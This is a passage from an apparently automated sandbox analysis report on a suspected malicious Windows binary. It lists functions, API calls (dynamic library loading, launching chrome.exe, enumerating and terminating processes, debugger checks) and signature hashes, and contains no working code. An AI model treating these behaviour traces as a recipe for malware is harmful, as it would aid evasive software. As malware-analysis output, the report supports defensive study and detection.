                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Startup
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 724789610-0
                                                                                                                                                        • Opcode ID: 22ca85fd3f06662cfec0d26b4cb1330711db51ac9713fbe80ff21241f2df7216
                                                                                                                                                        • Instruction ID: ae04e894da3d2b422cc704ea447363aa3b6b793d4aa3a88de296f6bbb0fb7005
                                                                                                                                                        • Opcode Fuzzy Hash: 22ca85fd3f06662cfec0d26b4cb1330711db51ac9713fbe80ff21241f2df7216
                                                                                                                                                        • Instruction Fuzzy Hash: CAD02B319252144FD710F63C6C0E271339CD305331F1002769CB9C11C0FD08461649D5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004262C6, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,006B100F,000000FF), ref: 004262EA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                        • Opcode ID: f3e851b96addafd438419018c203b5462939b6412b37e2b6c71ed6f05088ec25
                                                                                                                                                        • Instruction ID: 0c118dd32ed582705f208d95819151d556d0d2e04ca72ba23b7090b258e1a922
                                                                                                                                                        • Opcode Fuzzy Hash: f3e851b96addafd438419018c203b5462939b6412b37e2b6c71ed6f05088ec25
                                                                                                                                                        • Instruction Fuzzy Hash: DCE0C231945E84EBC7329F68DC04B20B3A5F70AB25F5003BEE82942FF0CB791851CA55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00411CE2, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • std::_Deallocate.LIBCONCRT ref: 00411CF4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Deallocatestd::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1323251999-0
                                                                                                                                                        • Opcode ID: 0cb9cee5bef630dee4736c224c2e5bd8915135b9242d4a746cdf8ab5a95fbec0
                                                                                                                                                        • Instruction ID: 935f13df81fae78e233c0af0d454e4b127b8ed40fe1dc2697be2fda146cddfe1
                                                                                                                                                        • Opcode Fuzzy Hash: 0cb9cee5bef630dee4736c224c2e5bd8915135b9242d4a746cdf8ab5a95fbec0
                                                                                                                                                        • Instruction Fuzzy Hash: 50D067719106119FD770DF7DE945B96B7E4AF04700F24483EE4D9D2664F675A8C0CB40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00680E81, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1448380652-0
                                                                                                                                                        • Opcode ID: d78d9142898b9c98952a14e3dedbcd9244443e9bdde8ff525791cf48f29bf47b
                                                                                                                                                        • Instruction ID: 8358e273cd62a1121eec4a30b2b28f7e07238832b21c82d0dfd304000e4553e0
                                                                                                                                                        • Opcode Fuzzy Hash: d78d9142898b9c98952a14e3dedbcd9244443e9bdde8ff525791cf48f29bf47b
                                                                                                                                                        • Instruction Fuzzy Hash: E3B0123109890E7A7E547DF5EC098773B5EC611A607400B26FC0DC40F1DD12A4544185
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00414312, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0041431C
                                                                                                                                                          • Part of subcall function 0057ABC5: __Thrd_current.LIBCPMT ref: 0057ABD7
                                                                                                                                                          • Part of subcall function 0057ABC5: __Mtx_unlock.LIBCPMT ref: 0057AC23
                                                                                                                                                          • Part of subcall function 0057ABC5: __Cnd_broadcast.LIBCPMT ref: 0057AC2E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cnd_broadcastCnd_do_broadcast_at_thread_exitMtx_unlockThrd_current
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3770271663-0
                                                                                                                                                        • Opcode ID: 67da1aa62ae980355478264cf44e6315053687dbe5315709f50b16d5166c244b
                                                                                                                                                        • Instruction ID: 405b687a562a499c2f31559f489e5af26c2a113d013579d73062ad7a19564b07
                                                                                                                                                        • Opcode Fuzzy Hash: 67da1aa62ae980355478264cf44e6315053687dbe5315709f50b16d5166c244b
                                                                                                                                                        • Instruction Fuzzy Hash: BDC092322582088F9340EBB8E489C2A7BE9AF957107008075B9098B621DE31BC14DA9A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 004F2AA7, Relevance: 132.9, APIs: 3, Strings: 69, Instructions: 6899libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,0000006E,00000065,00000070,0000006F), ref: 004F7E93
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004F7EA0
                                                                                                                                                        • GetProcAddress.KERNEL32(0042A244), ref: 004F7F82
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                        • String ID: $"$"$#$$$$$%$%$&$&$&$*$*$+$,$-$5$8$9$9$:$<$>$@$A$B$F$F$G$G$H$J$K$L$L$L$M$O$O$P$S$T$U$V$V$Z$[$\$]$^$_$a$c$e$f$j$j$k$m$n$q$u$u$x$x$y$|$|$~
                                                                                                                                                        • API String ID: 2238633743-870878446
                                                                                                                                                        • Opcode ID: 95440dd44cc0fc8e6b58b97573b950fd75d7b32fa83f4d37b1d28c9fcbe69483
                                                                                                                                                        • Instruction ID: a1b9d0a6092231459a0a291868cf37ce2bd6bb804399743b1d4ecb0a163a8f6d
                                                                                                                                                        • Opcode Fuzzy Hash: 95440dd44cc0fc8e6b58b97573b950fd75d7b32fa83f4d37b1d28c9fcbe69483
                                                                                                                                                        • Instruction Fuzzy Hash: 1CD35B315087809FD729DF78C9856EAFBE0FF89304F00462FD5899B252DB38A549CB5A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042ABC1, Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 762processthreadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042ABC5
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0042ABD0
                                                                                                                                                          • Part of subcall function 0044A710: __EH_prolog.LIBCMT ref: 0044A715
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0042ABF9
                                                                                                                                                          • Part of subcall function 0045D6D3: __EH_prolog.LIBCMT ref: 0045D6D8
                                                                                                                                                        • _wcslen.LIBCMT ref: 0042AD77
                                                                                                                                                          • Part of subcall function 0045CDB1: __EH_prolog.LIBCMT ref: 0045CDB6
                                                                                                                                                          • Part of subcall function 0045CDB1: GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 0045CDED
                                                                                                                                                          • Part of subcall function 0045D80A: __EH_prolog.LIBCMT ref: 0045D80F
                                                                                                                                                          • Part of subcall function 004AB640: __EH_prolog.LIBCMT ref: 004AB645
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                          • Part of subcall function 004A5476: std::_Deallocate.LIBCONCRT ref: 004A54A6
                                                                                                                                                          • Part of subcall function 0045D6D3: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 0045D759
                                                                                                                                                          • Part of subcall function 0045D6D3: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000), ref: 0045D78F
                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00000000,00000001,00000000,00000000,00000000), ref: 0042B2EA
                                                                                                                                                        • TerminateProcess.KERNEL32(?,00000000,00000001,00000000,00000001,00000000), ref: 0042B3EE
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000001,00000000,00000001,00000000), ref: 0042B428
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0042B42B
                                                                                                                                                          • Part of subcall function 0041D156: __Thrd_sleep.LIBCPMT ref: 0041D1E9
                                                                                                                                                          • Part of subcall function 0042A2F9: __EH_prolog.LIBCMT ref: 0042A2FE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$ByteCharCloseDeallocateHandleMultiProcessWidestd::_$CreateCurrentExceptionException@8PathRaiseTempTerminateThrd_sleepThreadThrow_wcslen
                                                                                                                                                        • String ID: !$.html$chrome.exe
                                                                                                                                                        • API String ID: 927760891-3963154113
                                                                                                                                                        • Opcode ID: 2e44e9ecdd755614c6631b9a0967eba65b1f2ce40e541ac21d02ffdab4a3efd5
                                                                                                                                                        • Instruction ID: db334ceb78eb482f1641b7bc4cb62cf9f54c34c14122109889b5a49a06c8da20
                                                                                                                                                        • Opcode Fuzzy Hash: 2e44e9ecdd755614c6631b9a0967eba65b1f2ce40e541ac21d02ffdab4a3efd5
                                                                                                                                                        • Instruction Fuzzy Hash: F0629071D01258EFDB14EBA4DD85BEEBB74AF15308F10809EE145AB182DB781F48CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0045624F, Relevance: 12.1, APIs: 8, Instructions: 70processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00456254
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00456275
                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0045628F
                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?,0000007F), ref: 004562C1
                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 004562D0
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004562D7
                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 004562E5
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004562F1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstH_prologNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1826667869-0
                                                                                                                                                        • Opcode ID: 74dbe86706bb8beb0974baf6744c6b11537c72b33effb5ff934f7fe933f87b5d
                                                                                                                                                        • Instruction ID: cdca48a62f3c255af95a2651484e0c862bb845f65dab0f10a1249e856f511285
                                                                                                                                                        • Opcode Fuzzy Hash: 74dbe86706bb8beb0974baf6744c6b11537c72b33effb5ff934f7fe933f87b5d
                                                                                                                                                        • Instruction Fuzzy Hash: E021D871A01719ABDB20AF64DC48BEE77BDFF04305F00005AF909D6581DBB88A84CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006AB537, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 006A0BBE: GetLastError.KERNEL32(?,?,0068BA4F,0077A468,00000010), ref: 006A0BC2
                                                                                                                                                          • Part of subcall function 006A0BBE: _free.LIBCMT ref: 006A0BF5
                                                                                                                                                          • Part of subcall function 006A0BBE: SetLastError.KERNEL32(00000000), ref: 006A0C36
                                                                                                                                                          • Part of subcall function 006A0BBE: _abort.LIBCMT ref: 006A0C3C
                                                                                                                                                          • Part of subcall function 006A0BBE: _free.LIBCMT ref: 006A0C1D
                                                                                                                                                          • Part of subcall function 006A0BBE: SetLastError.KERNEL32(00000000), ref: 006A0C2A
                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 006AB643
                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 006AB69E
                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 006AB6AD
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,0069D4C0,00000040,?,0069D5E0,00000055,00000000,?,?,00000055,00000000), ref: 006AB6F5
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,0069D540,00000040), ref: 006AB714
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 745075371-2802557318
                                                                                                                                                        • Opcode ID: cd033200bd6c45214ded5aa9881639515dc632104da700a08bfd5fb40a0a8f55
                                                                                                                                                        • Instruction ID: 60fe48787c9dc3293904594a498a69d3bd17b75dbbacb804e588236f35be0b4b
                                                                                                                                                        • Opcode Fuzzy Hash: cd033200bd6c45214ded5aa9881639515dc632104da700a08bfd5fb40a0a8f55
                                                                                                                                                        • Instruction Fuzzy Hash: 9F518171E002059BEF20FFA4DC45AFA77BAEF06700F04656AE915EB292E7709D408F65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006AABFF, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 006A0BBE: GetLastError.KERNEL32(?,?,0068BA4F,0077A468,00000010), ref: 006A0BC2
                                                                                                                                                          • Part of subcall function 006A0BBE: _free.LIBCMT ref: 006A0BF5
                                                                                                                                                          • Part of subcall function 006A0BBE: SetLastError.KERNEL32(00000000), ref: 006A0C36
                                                                                                                                                          • Part of subcall function 006A0BBE: _abort.LIBCMT ref: 006A0C3C
                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0069D4C7,?,?,?,?,0069CF1E,?,00000004), ref: 006AACE1
                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 006AAD71
                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 006AAD7F
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0069D4C7,00000000,0069D5E7), ref: 006AAE22
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 4212172061-2802557318
                                                                                                                                                        • Opcode ID: 26d121bb2c3c46f4ed312a35aa3126cc6e3f8e038d69473322be9871101176c8
                                                                                                                                                        • Instruction ID: 0da069d7908c47f9c0bc9dbdef5756b5ea3a3636bbe6f186ce6c09a8705f54e2
                                                                                                                                                        • Opcode Fuzzy Hash: 26d121bb2c3c46f4ed312a35aa3126cc6e3f8e038d69473322be9871101176c8
                                                                                                                                                        • Instruction Fuzzy Hash: 8F61D671600202ABEB24BBA4CC46AFA73AAEF06311F14052EF945D7681E774ED41CF66
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006AB363, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,006AB682,?,00000000), ref: 006AB3FC
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,006AB682,?,00000000), ref: 006AB425
                                                                                                                                                        • GetACP.KERNEL32(?,?,006AB682,?,00000000), ref: 006AB43A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                        • Opcode ID: d02edd1c6e41ae87911a64401076689c947b402e6b91c3764e811e8e1b805df3
                                                                                                                                                        • Instruction ID: 1593baab3239a0a55e0197dc9a49c7514494ec8d424488c3459a26b886adae5a
                                                                                                                                                        • Opcode Fuzzy Hash: d02edd1c6e41ae87911a64401076689c947b402e6b91c3764e811e8e1b805df3
                                                                                                                                                        • Instruction Fuzzy Hash: FD21B222A00104A7DF34AF14C901BEB77E7EF5AB54B669064E90AC7307E732DD41CB50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004231B3, Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004231C5
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • GetLastError.KERNEL32(?,0077B2B0,?,004A5451,80004005,00795A54,?,004ED10E,00000000,?,00795A50,?,?,004ED4D5), ref: 004231CB
                                                                                                                                                          • Part of subcall function 004231B3: LoadResource.KERNEL32(?,?,00795A50,?,?,8007000E,?,?,?,004A5451,80004005,00795A54,?,004ED10E,00000000), ref: 0042322C
                                                                                                                                                          • Part of subcall function 004231B3: LockResource.KERNEL32(00000000,00795A54,?,?,00795A50,?,?,8007000E,?,?,?,004A5451,80004005,00795A54,?,004ED10E), ref: 00423238
                                                                                                                                                          • Part of subcall function 004231B3: SizeofResource.KERNEL32(?,?,?,?,00795A50,?,?,8007000E,?,?,?,004A5451,80004005,00795A54,?,004ED10E), ref: 00423246
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$ErrorExceptionException@8LastLoadLockRaiseSizeofThrow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 294969344-0
                                                                                                                                                        • Opcode ID: b446f370644f7f2f6f13515682f479e3ba7334d86d1b96779fc3e1f5997f54f5
                                                                                                                                                        • Instruction ID: 04a12550aa672a69eb807832e2939eb74f06f05c9fad19abd4d90ad7b90dd5a2
                                                                                                                                                        • Opcode Fuzzy Hash: b446f370644f7f2f6f13515682f479e3ba7334d86d1b96779fc3e1f5997f54f5
                                                                                                                                                        • Instruction Fuzzy Hash: F4212631700238E7CB345E69AC4897B77BCEA4174279049ABFD4AD3611DA2CDE4081F9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004276C4, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 358COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 1302938615-2564639436
                                                                                                                                                        • Opcode ID: b2a25141932dc4870ebcb4ef8da86e9f7f0c428abdb1b091bff6756494c1ce3c
                                                                                                                                                        • Instruction ID: 45f3df42dc9291f8474769cedd739dfa76bd502a4fdfca550cdcdf9392b4eab8
                                                                                                                                                        • Opcode Fuzzy Hash: b2a25141932dc4870ebcb4ef8da86e9f7f0c428abdb1b091bff6756494c1ce3c
                                                                                                                                                        • Instruction Fuzzy Hash: 6FE1CA28F0D2D08EEB16DF6DA8A01AE7F729B9A310748C0DBC5D55B323C6385A15C779
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00411532, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00411536
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00411541
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow
                                                                                                                                                        • String ID: ,+x$,+x
                                                                                                                                                        • API String ID: 1681477883-118575591
                                                                                                                                                        • Opcode ID: 8fa3b555e405c6afa615bb79317454bdba0595af9c4ad822bdcae21beb4a4e21
                                                                                                                                                        • Instruction ID: 2d89f30447fd1eb6a22ce17d32bc5f14c3f03830b899fdc10365b96987898e72
                                                                                                                                                        • Opcode Fuzzy Hash: 8fa3b555e405c6afa615bb79317454bdba0595af9c4ad822bdcae21beb4a4e21
                                                                                                                                                        • Instruction Fuzzy Hash: 3181CC70D052689FDB08CFA9D4806EDFFB1AF19300F18016FE556AB352C3759982CBA9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0068B781, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0068B879
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0068B883
                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0068B890
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 3906539128-2802557318
                                                                                                                                                        • Opcode ID: d0cf191b7a2185ae1eabfbfb233e720abee1f700e0f5abce433bb1d7e91206b5
                                                                                                                                                        • Instruction ID: 8ef98e4b72d5777eb0d5ca8696766688f5d1806c1edb6359cf232badccb796c4
                                                                                                                                                        • Opcode Fuzzy Hash: d0cf191b7a2185ae1eabfbfb233e720abee1f700e0f5abce433bb1d7e91206b5
                                                                                                                                                        • Instruction Fuzzy Hash: 5231D37490121C9BCB61EF64D888BDCBBB9BF08310F5052EAE40CA7290EB749B858F45
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C6B10, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 005C6650: CreateFileW.KERNEL32(00000000,00000007,00000007,00000007,00000007,00000007,00000007,005C6B4D,kv\,00000000,00000007,00000000,00000003,02200000,00000000,7E374B29), ref: 005C6672
                                                                                                                                                        • new.LIBCMT ref: 005C6B6F
                                                                                                                                                        • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 005C6BAB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ControlCreateDeviceFile
                                                                                                                                                        • String ID: )K7~$kv\
                                                                                                                                                        • API String ID: 107608037-3940561195
